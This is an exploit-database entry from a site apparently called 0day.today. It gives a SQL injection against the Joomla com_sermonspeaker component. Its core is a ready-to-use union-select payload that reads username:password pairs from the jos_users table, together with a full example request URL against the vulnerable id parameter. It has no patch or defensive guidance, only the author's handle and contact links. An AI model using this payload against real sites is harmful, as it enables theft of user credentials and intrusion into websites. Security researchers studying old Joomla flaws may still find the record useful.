[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_sermonspeaker SQL Injection Vulnerability

Author
SadHaCkEr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11757
Category
web applications
Date add
12-04-2010
Platform
php
==============================================================
Joomla Component com_sermonspeaker SQL Injection Vulnerability 
==============================================================

# Title:Joomla Component com_sermonspeaker SQL Injection Vulnerability
# Author: SadHaCkEr
# Data  : 2010-04-12
  
[~]######################################### InformatioN #############################################[~]
 
#AUTHOR:            SadHaCkEr                                               
#Email:             n5s@hotmail.[choose ANY ONE]   IF U lucky  U will Find Me                            
#Website:           http://www.sadx.297m.com/                               
#Forum :            http://v4-team.net/cc                                   
     
[~]#########################################   ExploiT   #############################################[~]
   
[~] Vulnerable  :
   
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=[SQL]
   
[~] ExploiT         :
   
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/
   
[~] Example         :
   
http://127.0.0.1/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/



#  0day.today [2024-11-16]  #